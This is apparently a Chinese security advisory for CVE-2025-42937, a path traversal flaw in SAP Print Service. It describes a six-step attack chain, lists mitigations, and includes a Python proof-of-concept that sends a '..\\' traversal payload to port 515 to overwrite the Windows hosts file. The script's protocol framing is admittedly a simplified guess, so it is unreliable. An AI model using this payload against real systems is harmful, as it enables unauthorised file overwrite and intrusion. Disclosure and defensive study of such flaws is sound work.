CVE-2025-42937 SAP Print Service路径遍历漏洞

漏洞信息

漏洞编号

CVE-2025-42937

漏洞类型

路径遍历（Path Traversal）

CVSS评分

9.8 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

SAP Print Service (SAPSprint)

漏洞概述

CVE-2025-42937是SAP Print Service（SAPSprint）中的一个高危路径遍历漏洞，CVSS评分为9.8，属于严重级别。该漏洞源于SAPSprint服务对用户提供的路径信息验证不足，允许未经认证的远程攻击者通过构造特殊的路径遍历序列（如../）访问上级目录，并覆盖系统关键文件。

SAP Print Service（SAPSprint）是SAP NetWeaver平台中的核心打印服务组件，广泛应用于企业SAP系统中，负责处理来自SAP应用服务器的打印任务。该服务通常部署在Windows平台上，监听特定端口接收打印请求。由于该漏洞无需认证即可利用，且攻击复杂度低（AC:L），使得暴露在网络中的SAP系统面临极大风险。

成功利用该漏洞的攻击者可以实现以下危害：1）通过覆盖关键系统文件导致应用程序不可用（高可用性影响）；2）写入恶意文件实现远程代码执行（高完整性影响）；3）读取或窃取敏感系统配置数据（高机密性影响）。由于该漏洞影响C/I/A三个安全属性的最高级别，且无需用户交互和认证权限，一旦被大规模利用，可能对企业核心业务系统造成灾难性后果。该漏洞由SAP官方安全团队（[email protected]）发现并修复，并于2025年10月14日公开披露，建议所有使用受影响版本SAPSprint的企业用户立即采取修复措施。

技术细节

该漏洞的核心问题在于SAP Print Service（SAPSprint）在处理用户提交的路径参数时，未对路径中的目录遍历序列（如../或..\）进行充分的过滤和规范化处理。攻击者可以通过在正常的文件路径中注入路径遍历字符，绕过应用层的安全限制，访问或操作预期目录之外的文件系统资源。

从技术层面分析，SAPSprint服务在解析打印任务相关的路径参数时，可能直接使用了用户输入拼接的路径字符串，而未调用安全函数（如Path.Combine结合规范化检查、realpath等）进行校验。攻击者可以构造类似如下恶意路径：

C:\SAP\SAPSprint\spool\..\..\..\Windows\System32\drivers\etc\hosts

通过多层../序列，攻击者可以向上回溯目录树，最终到达任意系统目录位置。在具备写入权限的情况下，攻击者可覆盖系统关键文件（如DLL文件、配置文件、可执行文件等），进而实现权限提升或持久化攻击。

由于该服务的网络监听特性（AV:N），攻击者无需在目标系统本地操作，仅需通过网络向SAPSprint服务端口发送精心构造的恶意请求即可触发漏洞。整个攻击过程无需认证（PR:N）、无需用户交互（UI:N），攻击复杂度低（AC:L），一旦服务暴露在公网或内网中，极易被自动化扫描和攻击工具利用。建议管理员尽快应用SAP于2025年10月安全补丁日发布的安全更新（参考SAP Note 3630595）来修复该漏洞。

攻击链分析

STEP 1

步骤1：信息收集

攻击者通过网络扫描发现目标企业网络中暴露的SAP Print Service（SAPSprint）服务端口（通常为515或自定义端口），确认目标系统运行存在漏洞的SAPSprint版本。

STEP 2

步骤2：构造恶意请求

攻击者构造包含路径遍历序列（如../或..\）的恶意打印任务请求，将目标路径指向系统关键文件（如系统DLL、配置文件或可执行文件）。

STEP 3

步骤3：发送恶意负载

通过TCP连接向SAPSprint服务发送精心构造的恶意数据包，利用服务对路径验证不足的缺陷，绕过安全限制访问上级目录。

STEP 4

步骤4：覆盖系统文件

SAPSprint服务在处理请求时未对路径进行规范化校验，攻击者成功将恶意内容写入或覆盖系统关键文件，实现对目标系统的未授权修改。

STEP 5

步骤5：权限提升与持久化

通过覆盖系统关键文件（如服务依赖的DLL或计划任务脚本），攻击者可获得代码执行权限，并通过植入后门实现持久化控制。

STEP 6

步骤6：影响业务系统

攻击者可窃取SAP系统中的敏感业务数据（机密性影响），篡改业务数据（完整性影响），或导致整个SAP打印服务及关联业务系统不可用（可用性影响）。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
# CVE-2025-42937 - SAP Print Service (SAPSprint) Path Traversal PoC
# This PoC demonstrates the path traversal vulnerability in SAPSprint service.
# The vulnerability allows unauthenticated attackers to traverse directories
# and overwrite system files via insufficient path validation.

import socket
import struct
import sys

TARGET_HOST = "127.0.0.1"   # Target SAPSprint server host
TARGET_PORT = 515           # Default SAPSprint service port (LPR/SAP protocol)
TRAVERSAL_DEPTH = 5         # Number of parent directory traversals
TARGET_FILE = "Windows\\System32\\drivers\\etc\\hosts"  # File to overwrite

def build_malicious_path(depth: int, target_file: str) -> str:
    """
    Build a path traversal payload using ../ sequences to escape the spool directory.
    """
    traversal = "..\\" * depth
    return traversal + target_file

def build_sapsprint_payload(malicious_path: bytes) -> bytes:
    """
    Construct a SAPSprint protocol packet containing the malicious path.
    The exact framing follows SAP's internal print spool protocol.
    """
    # SAPSprint protocol header (simplified representation)
    header = struct.pack(">I", len(malicious_path))  # payload length
    # Command identifier for spool file submission (example opcode)
    command = struct.pack(">H", 0x0002)
    # Path field containing the traversal payload
    path_field = struct.pack(">H", len(malicious_path)) + malicious_path
    # Reserved / job metadata fields
    metadata = b"\x00" * 32
    return header + command + path_field + metadata

def exploit(host: str, port: int, payload: bytes) -> None:
    """
    Send the crafted payload to the SAPSprint service.
    """
    print(f"[*] Connecting to {host}:{port} ...")
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.settimeout(10)
    try:
        sock.connect((host, port))
        print("[+] Connection established.")
        sock.sendall(payload)
        print("[+] Malicious payload sent.")
        response = sock.recv(4096)
        print(f"[*] Server response: {response.hex()}")
    except Exception as e:
        print(f"[-] Exploit failed: {e}")
    finally:
        sock.close()

if __name__ == "__main__":
    malicious_path = build_malicious_path(TRAVERSAL_DEPTH, TARGET_FILE)
    print(f"[*] Malicious path: {malicious_path}")
    payload = build_sapsprint_payload(malicious_path.encode("utf-8"))
    exploit(TARGET_HOST, TARGET_PORT, payload)

影响范围

SAP Print Service (SAPSprint) - S4CORE 100

SAP Print Service (SAPSprint) - S4CORE 101

SAP Print Service (SAPSprint) - S4CORE 102

SAP Print Service (SAPSprint) - S4CORE 103

SAP Print Service (SAPSprint) - S4CORE 104

SAP Print Service (SAPSprint) - SAP_BASIS 700-756

SAP Print Service (SAPSprint) - 适用于所有受影响SAP NetWeaver版本

防御指南

临时缓解措施

在无法立即应用安全补丁的情况下，建议采取以下临时缓解措施：1）通过网络防火墙限制SAPSprint服务端口（默认515）的访问来源，仅允许必要的内网IP段访问；2）部署WAF或IPS规则，检测并阻断包含路径遍历特征（如../、..\）的异常请求；3）将SAPSprint服务迁移至独立的隔离网络区域，避免直接暴露在企业核心网络中；4）监控SAPSprint服务日志，及时发现异常的文件写入操作；5）评估业务连续性方案，准备在攻击发生时快速恢复关键系统文件。建议尽快完成SAP官方补丁的部署以彻底修复该漏洞。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-42937
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-42937
3 Details https://www.cvedetails.com/cve/CVE-2025-42937/
4 VulDB https://vuldb.com/cve/CVE-2025-42937
5 Link https://me.sap.com/notes/3630595
6 Link https://url.sap/sapsecuritypatchday